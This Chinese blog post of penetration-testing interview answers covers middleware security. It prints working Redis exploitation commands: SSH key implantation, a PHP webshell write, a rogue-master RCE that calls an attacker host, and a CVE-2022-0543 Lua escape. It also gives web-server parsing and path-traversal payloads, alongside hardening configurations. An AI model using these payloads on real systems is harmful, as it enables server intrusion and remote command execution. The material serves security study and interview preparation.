2025年常见渗透测试面试题- 常见中间件(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

常见中间件

一、Redis未授权访问漏洞攻防全解

[1. 漏洞利用三板斧](#1. 漏洞利用三板斧)

[2. 新型攻击手法](#2. 新型攻击手法)

[3. 防御体系构建](#3. 防御体系构建)

二、中间件解析漏洞全景剖析

[1. 经典解析漏洞矩阵](#1. 经典解析漏洞矩阵)

[2. 高级利用技巧](#2. 高级利用技巧)

[3. 防御方案](#3. 防御方案)

三、Java中间件生态全景

[1. 主流容器对比](#1. 主流容器对比)

[2. 新兴力量](#2. 新兴力量)

四、Tomcat安全加固十二律

五、Tomcat持久化机制解密

[1. 部署目录行为分析](#1. 部署目录行为分析)

[2. 防御实践](#2. 防御实践)

六、中间件安全演进趋势

深度防御建议

常见中间件

复制代码
Redis未授权访问漏洞如何入侵利用?

说说常见的中间件解析漏洞利用方式

JAVA有哪些比较常见的中间件容器?

tomcat要做哪些安全加固?

如果tomcat重启的话,webapps下,你删除的后台会不会又回来?

常见的网站服务器中间件容器。

一、Redis未授权访问漏洞攻防全解

1. 漏洞利用三板斧
  1. SSH密钥植入

    复制代码
    bash`redis-cli -h 10.2.3.4 flushall echo -e "\n\nssh-rsa AAAAB3NzaC1yc... user@kali" | redis-cli -x set crackit redis-cli config set dir /root/.ssh/ redis-cli config set dbfilename "authorized_keys" redis-cli save `

    通过修改Redis持久化路径,将公钥写入目标服务器认证文件

  2. Webshell写入

    适用于Web目录已知场景:

    复制代码
    bash`redis-cli config set dir /var/www/html/ redis-cli set shell "<?phpsystem($_GET['cmd']);?>" redis-cli config set dbfilename "webshell.php" redis-cli save `
  3. 主从复制RCE

    利用模块化攻击框架:

    复制代码
    bash`python3 redis-rogue-server.py --rhost 10.2.3.4 --lhost 192.168.1.5 `

    通过恶意主节点发送module load指令加载.so扩展库实现命令执行

2. 新型攻击手法
  • CVE-2022-0543 Lua沙箱逃逸
    利用Debian补丁漏洞执行任意命令:

    复制代码
    lua`eval 'local io = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io(); local f = io.popen("id", "r"); local res = f:read("*a"); return res' 0 `
3. 防御体系构建
复制代码
bash`# 修改redis.conf 关键配置 requirepass MyS3cr3tP@ss bind 127.0.0.1 ::1 rename-command FLUSHALL "" protected-mode yes `

二、中间件解析漏洞全景剖析

1. 经典解析漏洞矩阵
中间件 漏洞类型 利用示例 影响版本
IIS 6.0 目录解析漏洞 /test.asp/test.jpg Windows Server 2003
Apache 文件名解析特性 shell.php.rar 所有版本
Nginx %00截断 /test.jpg%00.php <0.8.37
PHP-CGI 参数解析漏洞 /test.jpg -s 192.168.1.5:4444 PHP<5.3.12
Tomcat 后缀绕过 /shell.jsp%20 7.x/8.x
2. 高级利用技巧
  1. IIS短文件名爆破

    使用工具扫描暴露的8.3格式短文件名:

    复制代码
    bash`iis_shortname_scan.py -u http://target/`
  2. Nginx配置错误

    错误配置导致源码泄露:

    复制代码
    nginx`location /static { alias /var/www/; }`

    访问/static../app/config.py 获取敏感文件

  3. WebLogic特殊后缀

    复制代码
    http`GET /ws_utc/begin.do?.css HTTP/1.1 `
3. 防御方案
  1. IIS加固

    • 禁用ASP解析功能
    • 配置请求过滤规则
  2. Apache修复

    复制代码
    apache`<FilesMatch "\.ph(p[3457]?|t|tml)$"> SetHandler application/x-httpd-php </FilesMatch>`

三、Java中间件生态全景

1. 主流容器对比
中间件 核心特性 常见漏洞
Tomcat Servlet/JSP容器 CVE-2017-12615(PUT上传)
WebLogic 企业级J2EE应用服务器 CVE-2020-14882(未授权RCE)
Jetty 轻量级嵌入式容器 CVE-2021-28169(路径遍历)
JBoss/WildFly Java EE开源实现 CVE-2017-12149(反序列化)
WebSphere IBM商业级解决方案 CVE-2020-4450(IIOP反序列化)
2. 新兴力量
  • Undertow:Red Hat高性能非阻塞服务器
  • Payara:GlassFish社区分支
  • OpenLiberty:IBM轻量化微服务容器

四、Tomcat安全加固十二律

  1. 权限最小化

    复制代码
    bash`useradd -M -s /sbin/nologin tomcat_user chown -R tomcat_user:tomcat_group /opt/tomcat/`
  2. 配置强化

    复制代码
    xml`<!-- conf/server.xml --> <Connector port="8080" maxHttpHeaderSize="8192" server="Undisclosed" address="127.0.0.1"/>`
  3. 管理界面防护

    复制代码
    xml`<!-- conf/tomcat-users.xml --> <role rolename="manager-script"/> <user username="deployer" password="Zxcv@1234!" roles="manager-script"/>`
  4. 协议升级

    复制代码
    xml`<Connector SSLEnabled="true" sslProtocol="TLS" sslEnabledProtocols="TLSv1.2,TLSv1.3" ciphers="TLS_AES_256_GCM_SHA384,..."/>`
  5. 入侵检测配置

    复制代码
    bash`# 部署Logstash监控日志 input { file { path => "/opt/tomcat/logs/*.log" start_position => "beginning" } }`

五、Tomcat持久化机制解密

1. 部署目录行为分析
  • 热部署机制webapps/目录变更触发自动加载

  • 备份恢复场景

    复制代码
    bash`# 典型目录结构 webapps/ ├── ROOT ├── app1.war ├── app1/ └── backup/ └── app1_20240411.bak `
2. 防御实践
  1. 彻底删除流程

    复制代码
    bash`rm -rf webapps/app1/ # 删除解压目录 rm webapps/app1.war # 删除部署包 sed -i '/app1/d' conf/Catalina/localhost/*.xml # 清理配置文件 `
  2. 防止自动恢复

    复制代码
    xml`<!-- conf/context.xml --> <Context antiResourceLocking="true" antiJARLocking="true"> <WatchedResource>WEB-INF/web.xml</WatchedResource> </Context>`

六、中间件安全演进趋势

  1. 云原生转型
    • 容器化部署:Kubernetes Operator管理中间件
    • Service Mesh:Istio实现安全流量管控
  2. 智能防护体系
    • AI驱动的WAF:动态识别0day攻击
    • RASP技术:实时阻断内存马注入
  3. 合规驱动
    • 等保2.0三级要求
    • GDPR数据安全规范
  4. 供应链安全
    • SBOM(软件物料清单)管理
    • 镜像签名验证
  5. 零信任架构
    • SPIFFE身份认证
    • 持续动态授权

深度防御建议

  1. 建立中间件资产清单

    复制代码
    csv`IP地址,中间件类型,版本号,开放端口,负责人 10.1.2.3,Tomcat,9.0.64,8080,张三 10.1.2.4,WebLogic,12.2.1.4,7001,李四 `
  2. 自动化漏洞扫描

    复制代码
    bash`# 使用Nexpose执行扫描 nexpose -s 10.1.2.0/24 -t middleware_scan `
  3. 红蓝对抗演练

    复制代码
    mermaid`graph LR A[制定攻击方案] --> B[模拟入侵] B --> C[横向移动] C --> D[获取敏感数据] D --> E[编写防御手册]`
  4. 安全左移实践

    复制代码
    bash`# 在CI/CD流水线集成安全检查 mvn verify -Dincludes=**/*.jsp -Dcheckstyle.config=security-check.xml `

本体系化解决方案覆盖中间件全生命周期安全管理,建议结合ATT&CK框架构建持续监控能力,通过自动化工具链实现安全能力闭环。

相关推荐
脱脱克克1 分钟前
2025.4.9 华为机考 第1题-补丁版本升级
python·算法·华为
倒霉男孩1 小时前
HTML视频和音频
前端·html·音视频
喜欢便码1 小时前
JS小练习0.1——弹出姓名
java·前端·javascript
暗暗那1 小时前
【面试】什么是回流和重绘
前端·css·html
小宁爱Python2 小时前
用HTML和CSS绘制佩奇:我不是佩奇
前端·css·html
weifexie2 小时前
ruby可变参数
开发语言·前端·ruby
千野竹之卫2 小时前
3D珠宝渲染用什么软件比较好?渲染100邀请码1a12
开发语言·前端·javascript·3d·3dsmax
sunbyte2 小时前
初识 Three.js:开启你的 Web 3D 世界 ✨
前端·javascript·3d
半兽先生2 小时前
WebRtc 视频流卡顿黑屏解决方案
java·前端·webrtc
anguruanjian3 小时前
探索安固软件:保护您的电子文档安全
安全·加密软件·安固软件·防泄密